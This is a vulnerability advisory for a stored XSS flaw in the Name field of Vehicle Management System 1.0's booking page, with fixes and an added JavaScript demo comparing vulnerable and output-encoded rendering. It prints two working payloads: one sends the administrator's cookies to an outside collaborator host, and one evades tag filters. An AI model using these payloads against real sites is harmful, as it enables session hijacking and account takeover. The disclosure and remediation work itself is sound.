Vehicle Management System 1.0 - Stored Cross-Site Scripting (XSS)
Vehicle Management System 1.0 contains a Stored Cross-Site Scripting (XSS) vulnerability in the Name parameter of /vehicle-management/booking.php. An attacker can submit a JavaScript payload in the Name field; the value is stored unencoded and executes in the browser of any administrator who views the booking list at /vehicle-management/bookinglist.php. This can lead to session hijacking or administrative account takeover.
Vulnerable Parameter: Name
Injection URL: /vehicle-management/booking.php
Execution URL: /vehicle-management/bookinglist.php
Type: Cross-Site Scripting (XSS)
Vendor: Vehicle Management System
Affected Version: 1.0
Guest User Attack:
A guest user submits a payload in the Name parameter at /vehicle-management/booking.php. The payload is stored and executes when an administrator views /vehicle-management/bookinglist.php. Example payload for session hijacking (it exfiltrates the administrator's cookies to an attacker-controlled host; replace oastify.com with your own collaborator or listener):
<img src=x onerror="this.src='http://oastify.com/?c='+document.cookie">
A second payload needs no outbound request or listener: it opens a dialog in the administrator's browser to prove execution (here showing document.cookie), and it uses a <details> element with an ontoggle handler rather than <script> or <img>, which may pass naive tag filters:
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
Note: the application may return a SQL error while the booking is being submitted, but the Name value is still stored and the payload still executes when the booking list is viewed.
Exploiting this vulnerability allows attackers to:
Execute arbitrary JavaScript in the context of the administrator’s session.
Hijack administrator sessions via stolen cookies.
Perform unauthorized actions or escalate privileges.
Recommended fixes:
Encode every user-supplied value at the point of output, especially Name, before writing it into bookinglist.php (in PHP, htmlspecialchars($value, ENT_QUOTES, 'UTF-8') covers both text and double-quoted attribute contexts), and validate input server-side on booking.php.
Deploy a Content Security Policy that disallows inline script and inline event handlers (no 'unsafe-inline' in script-src); this blocks both payloads above even where output encoding is missed.
Update to a patched version if one becomes available.
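The following is an added example, not code from Vehicle Management System or from the advisory author. It contrasts a vulnerable booking-list row template with an output-encoded one, feeds both the advisory's payloads through each, and checks whether the rendered HTML still contains a live tag with an event handler. The row template and the booking fields are assumptions about how bookinglist.php renders its table; the escaping function encodes the same five characters as PHP's htmlspecialchars($s, ENT_QUOTES, 'UTF-8'), so the fix ports directly.

```javascript
// Added example (not the application's code). Demonstrates why the stored
// Name fires on the booking list and how output encoding neutralises it.

// The two payloads from the advisory (the first with its quoting balanced).
const PAYLOADS = [
  `<img src=x onerror="this.src='http://oastify.com/?c='+document.cookie">`,
  `<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">`,
];

// HTML-entity encode for text nodes and double-quoted attribute values.
// Same character set as PHP htmlspecialchars($s, ENT_QUOTES, 'UTF-8').
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable rendering (assumed shape of the bookinglist.php row):
// the stored Name is concatenated into the markup untouched.
function renderRowVulnerable(booking) {
  return `<tr><td>${booking.id}</td><td>${booking.name}</td></tr>`;
}

// Hardened rendering: every untrusted field is encoded at the point of output.
function renderRowSafe(booking) {
  return `<tr><td>${escapeHtml(booking.id)}</td><td>${escapeHtml(booking.name)}</td></tr>`;
}

// Regression check: does the fragment still contain an element carrying an
// on* event handler attribute? Crude by design; a real test should load the
// page in a headless browser and watch for the handler firing.
const ACTIVE_MARKUP = /<\s*[a-z][^>]*\son[a-z]+\s*=/i;
function containsActiveMarkup(html) {
  return ACTIVE_MARKUP.test(html);
}

// Constructed sample bookings: one row per payload.
function sampleBookings() {
  return PAYLOADS.map((payload, i) => ({ id: i + 1, name: payload }));
}

// For each sample booking, report whether the vulnerable and the hardened
// templates leave active markup in the rendered row.
function demo() {
  return sampleBookings().map((booking) => ({
    id: booking.id,
    vulnerable: containsActiveMarkup(renderRowVulnerable(booking)),
    safe: containsActiveMarkup(renderRowSafe(booking)),
  }));
}

for (const result of demo()) {
  console.log(`booking ${result.id}: vulnerable=${result.vulnerable} safe=${result.safe}`);
}
```

Run it with node; both rows report vulnerable=true and safe=false. The check is a cheap unit-test guard against the encoding being dropped again, not a substitute for reviewing every place Name (and the other booking fields) is written into a page.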
Severity: High (CVSS 8.2)
Attack Vector: Network
Privileges Required: Low
User Interaction: Required (an administrator must view the booking list)